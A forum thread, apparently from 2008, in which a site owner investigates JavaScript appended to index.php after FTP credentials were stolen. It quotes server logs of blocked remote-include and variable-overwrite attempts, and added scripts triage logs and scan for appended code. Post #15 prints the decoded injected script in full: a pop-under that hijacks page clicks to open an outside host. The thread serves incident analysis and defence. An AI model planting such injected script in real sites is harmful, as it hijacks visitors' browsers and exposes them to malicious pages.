
Thread: Break-in on the server, or my fault? Code appended to index.php

  1. #11

    The only thing in the log that caught my attention was this:
    Code:
    [Tue Jul 08 03:16:53 2008] [error] [client 69.57.154.47] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST[Itemid]' through GET variables (attacker '69.57.154.47', file '/home/sircomp/ftp/index.php')
    [Tue Jul 08 03:16:54 2008] [error] [client 69.57.154.47] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable 'GLOBALS' through GET variables (attacker '69.57.154.47', file '/home/sircomp/ftp/index.php')
    [Tue Jul 08 03:16:54 2008] [error] [client 69.57.154.47] FastCGI: comm with server "/usr/local/apache/fcgi-bin/php-fcgi" aborted: error parsing headers: malformed header 'HTTP 1.0 301 Moved Permanently'
    [Tue Jul 08 07:26:58 2008] [error] [client 69.36.9.146] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST' through GET variables (attacker '69.36.9.146', file '/home/sircomp/ftp/index.php')
    [Tue Jul 08 07:26:58 2008] [error] [client 69.36.9.146] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST[option]' through GET variables (attacker '69.36.9.146', file '/home/sircomp/ftp/index.php')
    [Tue Jul 08 07:26:58 2008] [error] [client 69.36.9.146] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST[Itemid]' through GET variables (attacker '69.36.9.146', file '/home/sircomp/ftp/index.php')
    [Tue Jul 08 07:26:58 2008] [error] [client 69.36.9.146] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST' through GET variables (attacker '69.36.9.146', file '/home/sircomp/ftp/index.php')
    [Tue Jul 08 07:26:58 2008] [error] [client 69.36.9.146] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST[option]' through GET variables (attacker '69.36.9.146', file '/home/sircomp/ftp/index.php')
    [Tue Jul 08 07:26:58 2008] [error] [client 69.36.9.146] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST[Itemid]' through GET variables (attacker '69.36.9.146', file '/home/sircomp/ftp/index.php')

  2. #12

    One more thing intrigued me, but it is from a different day than the modification date of that file.
    The log from that day is 3x larger than usual (I have little traffic).
    Code:
    [Mon Jun 16 12:03:49 2008] [error] [client 67.225.198.22] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - Include filename ('http://www.autoimmoannonce.com/lang/i???/components/com_remository/com_remository_constants.php') is an URL that is not allowed (attacker '67.225.198.22', file '/home/sircomp/ftp/administrator/components/com_remository/admin.remository.php', line 16)
    Can someone help me decipher this?
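The ALERT entries quoted in posts #11 and #12 record requests that the PHP hardening layer blocked. The following triage script is an added example, not part of the thread: it groups such entries by source address and separates superglobal-overwrite attempts from remote-include attempts. The sample log is constructed in the same format, with placeholder addresses, host names and paths.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in the format of the excerpts quoted above; the addresses,
# host names and paths are placeholders, not values from the thread.
SAMPLE_LOG = """\
[Tue Jul 08 03:16:53 2008] [error] [client 192.0.2.10] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST[Itemid]' through GET variables (attacker '192.0.2.10', file '/home/example/ftp/index.php')
[Tue Jul 08 03:16:54 2008] [error] [client 192.0.2.10] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable 'GLOBALS' through GET variables (attacker '192.0.2.10', file '/home/example/ftp/index.php')
[Tue Jul 08 03:16:54 2008] [error] [client 192.0.2.10] FastCGI: comm with server "/usr/local/apache/fcgi-bin/php-fcgi" aborted: error parsing headers: malformed header 'HTTP 1.0 301 Moved Permanently'
[Mon Jun 16 12:03:49 2008] [error] [client 198.51.100.7] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - Include filename ('http://remote.example/lang/constants.php') is an URL that is not allowed (attacker '198.51.100.7', file '/home/example/ftp/administrator/components/com_demo/admin.demo.php', line 16)
"""

ALERT_RE = re.compile(
    r"^\[[^\]]+\] \[error\] \[client [^\]]+\] .*?stderr: ALERT - (?P<msg>.*)"
    r" \(attacker '(?P<attacker>[^']*)', file '(?P<script>[^']*)'(?:, line (?P<line>\d+))?\)$"
)
FORBIDDEN_VAR = re.compile(r"tried to register forbidden variable '([^']+)' through (\w+) variables")
URL_INCLUDE = re.compile(r"Include filename \('([^']*)'\) is an URL that is not allowed")

def classify(msg):
    """Map an ALERT message to (kind, detail)."""
    m = FORBIDDEN_VAR.search(msg)
    if m:  # request tried to overwrite a PHP superglobal through request variables
        return "superglobal-overwrite", f"{m.group(2)}:{m.group(1)}"
    m = URL_INCLUDE.search(msg)
    if m:  # a script was driven to include() a remote URL; the include was refused
        return "remote-include", m.group(1)
    return "other", msg

def summarize(log_text):
    """Group blocked attempts by source address: counts per kind, scripts hit, details."""
    out = defaultdict(lambda: {"kinds": Counter(), "scripts": set(), "details": set()})
    for line in log_text.splitlines():
        m = ALERT_RE.match(line.strip())
        if not m:
            continue  # not an ALERT entry (e.g. the FastCGI header error)
        kind, detail = classify(m["msg"])
        entry = out[m["attacker"]]
        entry["kinds"][kind] += 1
        entry["scripts"].add(m["script"] + (f":{m['line']}" if m["line"] else ""))
        entry["details"].add(detail)
    return dict(out)

if __name__ == "__main__":
    for ip, e in summarize(SAMPLE_LOG).items():
        print(ip, dict(e["kinds"]), sorted(e["scripts"]), sorted(e["details"]))
```

A remote-include entry names the script and line that performed the include, which is the component to review or update first.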

  3. #13

  4. #14

    Thanks for the link - it tells me quite a lot..........
    PS. I became a victim of my own stupidity - I could never be bothered to install AV - what for... I use the net consciously, I sit behind NAT, a double one at that, and then bam....
    It turns out my passwords were swiped and either someone logged in manually, or it was a bot that pulls out the FTP account and password and looks for the index.php file in the root on its own - something like that shouldn't be hard to write....
    ughhh...
    Last edited by sirapacz : 07-16-2008 - 19:58

  5. #15


    <script language="javascript">if (navigator.cookieEnabled){var pop_under = null;var pop_cookie_name = "advmaker_komap";var pop_timeout = 720;function pop_cookie_enabled(){var is_enabled = false;if (!window.opera && !navigator.cookieEnabled)return is_enabled;if (typeof document.cookie == 'string')if (document.cookie.length == 0){document.cookie = "test";is_enabled = document.cookie == 'test';document.cookie = '';}else{is_enabled = true;}return is_enabled;}function pop_getCookie(name){var cookie = " " + document.cookie;var search = " " + name + "=";var setStr = null;var offset = 0;var end = 0;if (cookie.length > 0){offset = cookie.indexOf(search);if (offset != -1){offset += search.length;end = cookie.indexOf(";", offset);if (end == -1){end = cookie.length;}setStr = unescape(cookie.substring(offset, end));}}return(setStr);}function pop_setCookie (name, value){document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";}function show_pop(){var pop_wnd = "http://busyfgves.com/cgi-bin/index.cgi?dx";var fea_wnd = "scrollbars=1,resizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";var need_open = true;if (document.onclick_copy != null)document.onclick_copy();if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();if (pop_under != null){if (!pop_under.closed)need_open = false;}if (need_open){if (pop_cookie_enabled()){val = pop_getCookie(pop_cookie_name);if (val != null){now = new Date();val2 = new Date(val);utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());if ( ( utc32 - utc2 ) / 1000 < pop_timeout*60){need_open = false;}}}}if (need_open){under = window.open(pop_wnd, "", fea_wnd);under.blur();window.focus();if (pop_cookie_enabled()){now = new Date();pop_setCookie(pop_cookie_name, now);}}}function pop_init(){var ver = parseFloat(navigator.appVersion);var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);if (ver2){if (document.links){for (var i=0; i<document.links.length; i++){if (document.links[i].target != "_blank"){document.links[i].onclick_copy = document.links[i].onclick;document.links[i].onclick = show_pop;}}}}document.onclick_copy = document.onclick;document.onmouseup = show_pop;}pop_init();}</script>
    This is the decoded code.
    Scan the computer(s) that have FTP access with other scanners. Apparently this virus looks for index.* files and appends its bit of code to them. I recently came across a situation where a similar entry appeared whenever photos were uploaded to the server via FTP.
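Post #15 describes code being appended to index.* files. The following check is an added example, not part of the thread: it walks a web root and reports index.* files where script or iframe markup follows the normal end of the page. The end-of-page heuristic (`</html>` or `?>`), the function names and the constructed sample files are assumptions of this example.

```python
import os
import re
import tempfile

CLOSERS = re.compile(r"</html\s*>|\?>", re.IGNORECASE)       # where a page normally ends
ACTIVE = re.compile(r"<\s*(script|iframe)\b", re.IGNORECASE)  # markup that runs or loads content
OBFUSCATED = re.compile(r"\b(unescape|eval|fromCharCode)\s*\(")

def appended_tail(text):
    """Return the text after the last </html> or ?> in a file ('' if neither occurs)."""
    matches = list(CLOSERS.finditer(text))
    return text[matches[-1].end():].strip() if matches else ""

def inspect(path):
    """Return a finding dict if active markup follows the end of the page, else None."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        tail = appended_tail(fh.read())
    if not ACTIVE.search(tail):
        return None
    return {"path": path, "tail_len": len(tail), "obfuscated": bool(OBFUSCATED.search(tail))}

def scan_webroot(root):
    """Check every index.* file under root, the files the post says were modified."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.lower().startswith("index."):
                hit = inspect(os.path.join(dirpath, name))
                if hit:
                    findings.append(hit)
    return findings

def demo():
    """Scan a constructed webroot: one clean index file and two with appended markup."""
    samples = {
        "index.html": "<html><body>ok</body></html>\n",
        "index.php": '<?php echo "ok"; ?>\n<script>document.write(unescape("%68%69"))</script>',
        "gallery/index.htm": '<html></html><iframe src="http://placeholder.invalid/"></iframe>',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return [(os.path.relpath(f["path"], root).replace(os.sep, "/"), f["obfuscated"])
                for f in scan_webroot(root)]

if __name__ == "__main__":
    print(demo())
```

A hit is a prompt to compare the file against a known-good copy and to check FTP logs around its modification time, not proof of compromise on its own.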
